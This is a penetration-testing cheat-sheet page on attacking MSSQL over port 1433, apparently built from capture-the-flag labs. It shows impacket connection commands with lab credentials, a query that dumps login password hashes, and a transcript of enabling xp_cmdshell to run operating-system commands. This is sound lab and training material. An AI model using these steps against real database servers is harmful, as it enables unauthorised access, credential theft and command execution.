MSSQL (tcp-1433)
Post

MSSQL (tcp-1433)

Connection

1
2
3
impacket-mssqlclient sa@10.11.1.31 -p 1433 -db tempdb
# Sometimes you need to specify a Windows Authentication
impacket-mssqlclient Archetype/sql_svc:M3g4c0rp123@10.129.95.187 -windows-auth

MSSQL basic commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
# Show databases available
select name from sys.databases
# It also works for the same but as a store procedure
sp_databases
# Select the database for list its content
use streamio_backup
# List the name of the tables from a database
select * from information_schema.tables;
# List all the tables from a db
select table_name FROM dba_tables;
# List all from a table
select * from users;
# List user permissions
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;

Examples: [[StreamIO#^2bc6f1]] Scrambled

Command execution from MSSQL

If we have access to the MSSQL we can try to execute commands from MSSQL:

1
2
3
4
5
6
7
8
9
10
11
SQL> xp_cmdshell "whoami"
[-] ERR0R(TALLY): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component ,xp_cmdshell’ because this component is turned off as part of the security figuration for this server. A system administrator can enable the use of ,xp_cmdshell' by using sp_configure. For more information about enabling 'xp.cmdshell', search for p_cmdshell' in SQL Server Books Online.
SQL> sp_configure "xp_cmdshell", 1
[-] ERR0R(TALLY): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
SQL> sp_configure "show advanced options", 1
[*] INF0(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> sp_configure "xp_cmdshell", 1
[*] INF0(TALLY): Line 185: Configuration option 'xp.cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> xp_cmdshell "whoami"

Examples: Scrambled Connect to database joined to the domain controller:

1
impacket-mssqlclient scrm.local/sa:sa@10.10.11.168

Examples: Scrambled

More than 200 results

If the results from a table are more than 200 it will be snipped, you can use queries to order the data by column:

1
2
3
SELECT TOP 200 *
FROM devsacc
ORDER BY name DESC;